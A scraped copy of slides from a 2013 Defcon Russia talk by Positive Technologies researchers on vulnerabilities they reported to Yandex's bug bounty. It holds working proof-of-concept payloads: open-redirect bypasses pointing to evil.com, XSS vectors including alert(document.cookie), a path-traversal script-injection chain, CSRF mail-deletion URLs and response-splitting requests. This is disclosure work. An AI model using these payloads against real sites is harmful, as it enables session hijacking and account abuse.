Без темы
<<  Xsite Produkte Your everyday partner in business travel  >>
21/02/2013 DCG #7812 г. Санкт-Петербург
21/02/2013 DCG #7812 г. Санкт-Петербург
Зачем мы участвовали
Зачем мы участвовали
Что предлагалось для поиска
Что предлагалось для поиска
10
10
9. Insufficient Transport Layer Protection
9. Insufficient Transport Layer Protection
8. Failure to Restrict URL Access
8. Failure to Restrict URL Access
7. Insecure Cryptographic Storage
7. Insecure Cryptographic Storage
6. Security Misconfiguration
6. Security Misconfiguration
5. Cross Site Request Forgery (CSRF)
5. Cross Site Request Forgery (CSRF)
4. Insecure Direct Object References
4. Insecure Direct Object References
3. Broken Authentication and Session Management
3. Broken Authentication and Session Management
2. Cross Site Scripting (XSS)
2. Cross Site Scripting (XSS)
1. Injection
1. Injection
1. Injection
1. Injection
Как искал уязвимости
Как искал уязвимости
Что нашел
Что нашел
Где нашел
Где нашел
Обход ограничения перенаправления №1
Обход ограничения перенаправления №1
Обход ограничения перенаправления №2
Обход ограничения перенаправления №2
Обход ограничения перенаправления №3
Обход ограничения перенаправления №3
Межсайтовое выполнение сценариев №1
Межсайтовое выполнение сценариев №1
Межсайтовое выполнение сценариев №2
Межсайтовое выполнение сценариев №2
Межсайтовое выполнение сценариев №3
Межсайтовое выполнение сценариев №3
Межсайтовое выполнение сценариев №3
Межсайтовое выполнение сценариев №3
Межсайтовое выполнение сценариев №3
Межсайтовое выполнение сценариев №3
Межсайтовое выполнение сценариев №3
Межсайтовое выполнение сценариев №3
Межсайтовое выполнение сценариев №4
Межсайтовое выполнение сценариев №4
Чтение участков памяти
Чтение участков памяти
Чтение участков памяти
Чтение участков памяти
Misconfiguration
Misconfiguration
XML Injection
XML Injection
XML Injection
XML Injection
Что получилось
Что получилось
Что увидели, но что не успели эксплуатировать
Что увидели, но что не успели эксплуатировать
Спасибо за внимание
Спасибо за внимание

Презентация на тему: «Yandex bug bounty part 2». Автор: Yury. Файл: «Yandex bug bounty part 2.ppt». Размер zip-архива: 1290 КБ.

Yandex bug bounty part 2

содержание презентации «Yandex bug bounty part 2.ppt»
СлайдТекст
1 21/02/2013 DCG #7812 г. Санкт-Петербург

21/02/2013 DCG #7812 г. Санкт-Петербург

Yandex bug bounty part 2

Сергей Бобров Алексей Осипов Positive Technologies

2 Зачем мы участвовали

Зачем мы участвовали

Яндекс – первая в России компания, активно заинтересованная в обеспечении безопасности пользователей. В том числе с помощью самих пользователей своих сервисов Мы не могли не помочь в этом начинании

Defcon Russia (DCG #7812)

2

3 Что предлагалось для поиска

Что предлагалось для поиска

A1-Injection

A2-Cross Site Scripting (XSS)

A3-Broken Authentication and Session Management

A4-Insecure Direct Object References

A5-Cross Site Request Forgery (CSRF)

A6-Security Misconfiguration

A7-Insecure Cryptographic Storage

A8-Failure to Restrict URL Access

A9-Insufficient Transport Layer Protection

A10-Unvalidated Redirects and Forwards

Defcon Russia (DCG #7812)

3

4 10

10

Unvalidated Redirects and Forwards

http://wt.yandex.ru/r?u=http://google.com http://fmo-lp.ya.ru/options_blogs_import_check.xml?ext_feed_host=google.com&final_retpage=http://google.com

Defcon Russia (DCG #7812)

4

5 9. Insufficient Transport Layer Protection

9. Insufficient Transport Layer Protection

Яндекс.диск – принимает само-подписанные сертификаты Многие (если не все) АПИ принимающие Oauth авторизацию – принимают запросы без SSL

Defcon Russia (DCG #7812)

5

6 8. Failure to Restrict URL Access

8. Failure to Restrict URL Access

Сервисы, которые могут делать запросы наружу, могут и посмотреть внутрь сети. http://webmaster.yandex.ru/sitemaptest.xml http://webmaster.yandex.ru/robots.xml

Defcon Russia (DCG #7812)

6

7 7. Insecure Cryptographic Storage

7. Insecure Cryptographic Storage

Снова мобильные платформы: Yandex.Mail – пароль от аккаунта хранится в plaintext до первого коннекта с сервером Yandex.Disk - сделав logout в приложении, токен сохраняется (выставляется -1 в поле is_logged), и снова можно тянуть файлы

Defcon Russia (DCG #7812)

7

8 6. Security Misconfiguration

6. Security Misconfiguration

http://school-wiki.yandex.ru/ /.htaccess/.php – получаем имена сценариев /_css/highlight_styles/pear.css = text/css /_css/highlight_styles/pear.css/.php = text/html http://courses.school.yandex.net/ Старая версия Вики, с возможностью проведения XSS

Defcon Russia (DCG #7812)

8

9 5. Cross Site Request Forgery (CSRF)

5. Cross Site Request Forgery (CSRF)

http://passport.yandex.ru/passport?mode=changereg http://passport.yandex.ru/passport?mode=tune http://ya.ru/json_do_vote.xml https://mail.yandex.ru/m/action_message_operate?ids={ANY_ID}&oper=delete

Defcon Russia (DCG #7812)

9

10 4. Insecure Direct Object References

4. Insecure Direct Object References

http://carddav.yandex.ru/ PROPFIND /calendars/{ANY}%40yandex.ru/ HTTP/1.0

Defcon Russia (DCG #7812)

10

11 3. Broken Authentication and Session Management

3. Broken Authentication and Session Management

Мобильные приложения – хранят токены после логаута

Defcon Russia (DCG #7812)

11

12 2. Cross Site Scripting (XSS)

2. Cross Site Scripting (XSS)

Reflected http://m.video.yandex.ru/#"><svg/onload=alert(1)> http://wt.yandex.ru/r?u={url-encoded-xss} Stored: http://moikrug.ru/master/profile/sites/ http://moikrug.ru/contacts/social/ http://%username%.ya.ru/posts_add_wishlist.xml http://%username%.ya.ru/index_video.xml http://video.yandex.ru/ Много их

Defcon Russia (DCG #7812)

12

13 1. Injection

1. Injection

Month of Yandex bugs hunting by @d0znpp

Defcon Russia (DCG #7812)

13

14 1. Injection

1. Injection

Defcon Russia (DCG #7812)

14

15 Как искал уязвимости

Как искал уязвимости

Ручной анализ Минимальная автоматизация Burp Repeater / Proxy + самописные плагины DOMinator Простые, но не «шаблонные» уязвимости Критичные сервисы

Defcon Russia (DCG #7812)

15

16 Что нашел

Что нашел

Memory Disclosure: 2 XSS: 4 Open Redirect: 5 SSRF: 1 Response Splitting: 2 CSRF: 1 Other: 2 Итого: 17

Defcon Russia (DCG #7812)

16

17 Где нашел

Где нашел

mail.yandex.ru 5 pass.(yandex|moikrug).ru 4 yandex.ru 2 calendar.yandex.ru 2 maps/pogoda/blogs/news/market/… 1* cards.yandex.ru 1 zakladki.yandex.ru 1 feedback.yandex.ru 1

Defcon Russia (DCG #7812)

17

18 Обход ограничения перенаправления №1

Обход ограничения перенаправления №1

http://zakladki.yandex.ru/redirect.xml?retpath=[URL] Ограничения: - URL начинается с «/» или «[a-zA-Z0-9-.]{0,}yandex.[a-z]{2,3}» Обходы: [Все браузеры]: http://yandex.ru.evil.com/ [Все браузеры]: //evil.com/ [Кроме IE]: http://yandex.ru:x@evil.com/

Defcon Russia (DCG #7812)

18

19 Обход ограничения перенаправления №2

Обход ограничения перенаправления №2

http://pass.yandex.ru/logout?retpath=[URL] http://pass.moikrug.ru/?retpath=[URL] http://passport.yandex.ru/passport?mode=logout&retpath=[URL] Ограничения: - Принадлежность хоста [a-zA-Z0-9-.] Яндексу Обходы: [Все браузеры]: http://yandex.ru_.evil.com/

Defcon Russia (DCG #7812)

19

20 Обход ограничения перенаправления №3

Обход ограничения перенаправления №3

http://mail.yandex.ru/m/action_message_operate?oper=delete&retpath=[URL] Ограничения: - Блокируются все ссылки включающие «://» - Если начинается с «/», добавляется http://mail.yandex.ru Обходы: [FireFox, Safari]: data:text/html,<html> [Chrome]: http:/\evil.com [Chrome, IE]: \/evil.com [Chrome, IE]: http:/%09/evil.com

Defcon Russia (DCG #7812)

20

21 Межсайтовое выполнение сценариев №1

Межсайтовое выполнение сценариев №1

http://yandex.ru/yandsearch?text=Эмили Уотсон<script>alert(1)</script> В выдачу по запросу «Эмили Уотсон[XSS]» были добавлены результаты по похожим запросам

Defcon Russia (DCG #7812)

21

22 Межсайтовое выполнение сценариев №2

Межсайтовое выполнение сценариев №2

http://yandex.ru/yandsearch?text=\x3cimg+src=x+\x6f\x6eerror=alert(1)\x3e var title = "\x3cXSS\x3e — Яндекс: ничего не найдено"; el = document.createElement("i"); el.innerHTML = title;

Defcon Russia (DCG #7812)

22

23 Межсайтовое выполнение сценариев №3

Межсайтовое выполнение сценариев №3

Входящие параметры пользователей часто попадают в запрос к clck.yandex.ru в Request-Path без предварительной обработки. Пример (maps.yandex.ru, user_input=test): http://clck.yandex.ru/jclck/dtype=stred/bla-bla-bla/pos=4/text=test/user_input=test/ratio=4.4.2/bla-bla-bla Ответ (выполняется в контексте безопасности maps.yandex.ru): /* counted */

Defcon Russia (DCG #7812)

23

24 Межсайтовое выполнение сценариев №3

Межсайтовое выполнение сценариев №3

Так же на сервере присутствует сценарий http://clck.yandex.ru/redir/*http://yandex.ru/ HTTP/1.1 302 Redirect Location: http://yandex.ru/ Используя «/../» возможно изменить путь к сценарию и запросить «redir». Таким образом можно выполнить произвольный js файл в пределах *.yandex.ru.

Defcon Russia (DCG #7812)

24

25 Межсайтовое выполнение сценариев №3

Межсайтовое выполнение сценариев №3

Финальный payload: ../../../../../../../../../../../redir/*http://api-maps.yandex.ru/2.0.10/release/combine.xml?modules=test&jsonp_prefix=alert('xss')//&# Заходим, нажимаем кнопку «Найти»: http://blogs.yandex.ru/search.xml?text=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fredir%2F*http%3A%2F%2Fapi-maps.yandex.ru%2F2.0.10%2Frelease%2Fcombine.xml%3Fmodules%3Dtest%26jsonp_prefix%3Dalert%28%27xss%27%29%2F%2F%26%23

Defcon Russia (DCG #7812)

25

26 Межсайтовое выполнение сценариев №3

Межсайтовое выполнение сценариев №3

Уязвимые сайты: maps.yandex.ru, pogoda.yandex.ru, people.yandex.ru, blogs.yandex.ru, news.yandex.ru, market.yandex.ru, rabota.yandex.ru, harita.yandex.com.tr Проверялось только поле поиска на главной странице каждого сайта, если искать тщательнее, этих сайтов станет намного больше ?

Defcon Russia (DCG #7812)

26

27 Межсайтовое выполнение сценариев №4

Межсайтовое выполнение сценариев №4

http://mail.yandex.ru/x'+alert(document.cookie)+'x/%2e%2e/lite/inbox <script type="text/javascript"> PDA.prefix = '/x'+alert(document.cookie)+'x/'; </script> Эксплуатация возможна в Safari, Internet Explorer.

Defcon Russia (DCG #7812)

27

28 Чтение участков памяти

Чтение участков памяти

CVE-2012-1180 Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request. http://pass.moikrug.ru/?retpath=http://yandex.ru%00aaaaaaaaaaaaaaaa http://pass.moikrug.ru/?retpath=http://yandex.ru%0aSPLITTING%0a http://pass.yandex.ru/?retpath=http://ya.ru&clean=yes%00aaaaaaaaaaaaa http://pass.yandex.ru/?retpath=http://ya.ru&clean=yes%0aSPLITTING%0a

Defcon Russia (DCG #7812)

28

29 Чтение участков памяти

Чтение участков памяти

Defcon Russia (DCG #7812)

29

30 Misconfiguration

Misconfiguration

http://school-wiki.yandex.ru/ Настройка php-fpm по мануалу с хабра … приводит к тому, что злоумышленник может читать произвольные файлы и даже выполнять PHP код из них

Defcon Russia (DCG #7812)

30

31 XML Injection

XML Injection

Почему так? http://webmaster.yandex.ru/xsdtest.xml Можно валидировать произвольные документы Можно валидировать с помощью произвольных схем ???????? PROFIT Для каждого читаемого документа нужно отдельно настраивать резолв сущностей Незачем блокировать на исходящие запросы безобидный валидатор XML

Defcon Russia (DCG #7812)

31

32 XML Injection

XML Injection

Defcon Russia (DCG #7812)

32

33 Что получилось

Что получилось

Читать содержимое папок Читать некоторые файлы конфигов Узнать, что в Яндексе используют слабые пароли Монтируют множество сервисов как локальные каталоги Не разделяют права пользователей по сервисам

Defcon Russia (DCG #7812)

33

34 Что увидели, но что не успели эксплуатировать

Что увидели, но что не успели эксплуатировать

Mongo серверы с доступным REST-интерфейсом http://blog.ptsecurity.ru/2012/11/mongo-db.html Remote code execution Апдейты накатываются с помощью торрентов

Defcon Russia (DCG #7812)

34

35 Спасибо за внимание

Спасибо за внимание

SBobrov@ptsecurity.ru @Black2Fan AlOsipov@ptsecurity.ru @GiftsUngiven Positive Technologies

Defcon Russia (DCG #7812)

35

«Yandex bug bounty part 2»
http://900igr.net/prezentacija/anglijskij-jazyk/yandex-bug-bounty-part-2-63890.html
cсылка на страницу

Без темы

661 презентация
Урок

Английский язык

29 тем
Слайды